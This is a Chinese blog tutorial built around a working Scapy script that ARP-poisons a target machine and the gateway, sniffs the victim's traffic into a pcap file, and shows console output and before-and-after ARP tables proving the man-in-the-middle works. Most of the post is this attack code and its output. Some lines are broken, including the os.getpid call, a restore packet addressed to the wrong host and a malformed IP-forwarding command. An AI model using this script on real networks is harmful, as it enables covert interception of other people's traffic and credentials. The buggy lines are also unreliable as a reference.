Scapy之ARP投毒

直接上实例,具体意思我都在源码上备注了

#-*-coding:utf-8-*-
from scapy.all import *
import os
import sys
import threading
import string
import signal
#需嗅探的本地网卡
interact = "eth0"
#目标攻击IP
target_ip = "192.168.2.245"
#网关IP
gatway_ip = "192.168.2.254"
packet_count = 1000
 
#嗅探的网卡
conf.iface = interact
#关闭输出
conf.verb = 0
def get_mac(ip_address):
 
    responses,unanswered = srp(Ether(dst="01:02:03:04:05:06")/ARP(pdst=ip_address),timeout=2,retry=10)
    for s,r in responses:
        return r[Ether].src
    return None
 
def  restore_target(gatway_ip,gatway_mac,target_ip,target_mac):
 
    print "[*] Restoring target..."
    send(ARP(op=2,psrc=gatway_ip,pdst=gatway_ip,hwdst="01:02:03:04:05:06",hwsrc=gatway_mac),count=5)
    send(ARP(op=2,psrc=gatway_ip,pdst=target_ip,hwdst="01:02:03:04:05:06",hwsrc=target_mac),count=5)
 
    os.kill(os.getpid,sig=signal.SIGINT)
 
 
 
def  poison_target(gatway_ip,gatway_mac,target_ip,target_mac):
 
    poison_target = ARP()
    poison_target.op =2
    poison_target.psrc = gatway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac
 
    poison_gatewy = ARP()
    poison_gatewy.op =2
    poison_gatewy.psrc = target_ip
    poison_gatewy.pdst = gatway_ip
    poison_gatewy.hwdst = gatway_mac    
 
    print "[*] Beginning the ARP poison.[CTRL-C to stop]"
 
    #循环不断发送ARP请求
    while True:
        try:
            send(poison_target)
            send(poison_gatewy)
 
            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gatway_ip, gatway_mac, target_ip, target_mac)
 
    print "[*] ARP poison attack finised"
    return
 
print "[*] Setting up %s" % interact
 
gatway_mac = get_mac(gatway_ip)
 
if gatway_mac is None:
    print "[!!!] Faile to get gatway MAC.Exiting"
    sys.exit(0)
else:
    print "[*] Gatway %s is at %s" % (gatway_ip ,gatway_mac)
 
target_mac = get_mac(target_ip)
 
if target_mac is None:
    print "[!!!] Faile to get target_mac MAC.Exiting"
    sys.exit(0)
else:
     print "[*] target_mac %s is at %s" % (target_ip ,target_mac)
     #启动偷毒线程
     poison_thread = threading.Thread(target=poison_target, args=(gatway_ip,gatway_mac,target_ip,target_mac))
     poison_thread.start()
 
     try:
         print "[*] Starting sniffer for %d packets" % packet_count
 
         bpf_filter = "ip host %s" % target_ip
         #bpf过滤器
         #iface嗅探网卡
         #count次数
         packets = sniff(count=packet_count, filter=bpf_filter,iface=interact)
 
         #讲铺货的输出到文件
         wrpcap('arper.pcap',packets)
         #还原网络配置
         restore_target(gatway_ip,gatway_mac,target_ip,target_mac)
 
     except KeyboardInterrupt:
         restore_target(gatway_ip,gatway_mac,target_ip,target_mac)
         exit(0)

这样我们就能欺骗客户端192.168.2.245的电脑认为我们的电脑是网关

本机开启流量转发

echo >1 /proc/sys/net/ipv4/ip_forward

未开启脚本之前,客户端arp -a查看

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.2.245 --- 0x2
  Internet Address      Physical Address      Type
  192.168.2.254         00-30-18-1c-4b-29     dynamic
  192.168.101.1         bc-5f-f6-a9-19-1d     dynamic

开启软件

root@myspuerkali:~/python# python arper.py
[*] Setting up eth0
[*] Gatway 192.168.2.254 is at 00:30:18:1c:4b:29
[*] target_mac 192.168.2.245 is at 00:0c:29:ca:e8:e0
[*] Beginning the ARP poison.[CTRL-C to stop]
[*] Starting sniffer for 1000 packets

在查看客户机的ARP表

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.2.245 --- 0x2
  Internet Address      Physical Address      Type
  192.168.2.88          d0-50-99-0a-e8-23     dynamic
  192.168.2.249         00-50-56-2e-a2-d1     dynamic
  192.168.2.254         00-50-56-2e-a2-d1     dynamic
  192.168.101.1         bc-5f-f6-a9-19-1d     dynamic

成功伪装成功,这样客户端上网的流量将会转发到我们这里

又因为我们添加了这段代码
wrpcap(‘arper.pcap’,packets)
所以成功之后我们可以看到在脚本目录生产了一个arper.pcap文件
可以使用wireshark跟network miner等工具处理跟打开。
下篇文章将会简单介绍怎么处理pcap文件包

发表评论

邮箱地址不会被公开。 必填项已用*标注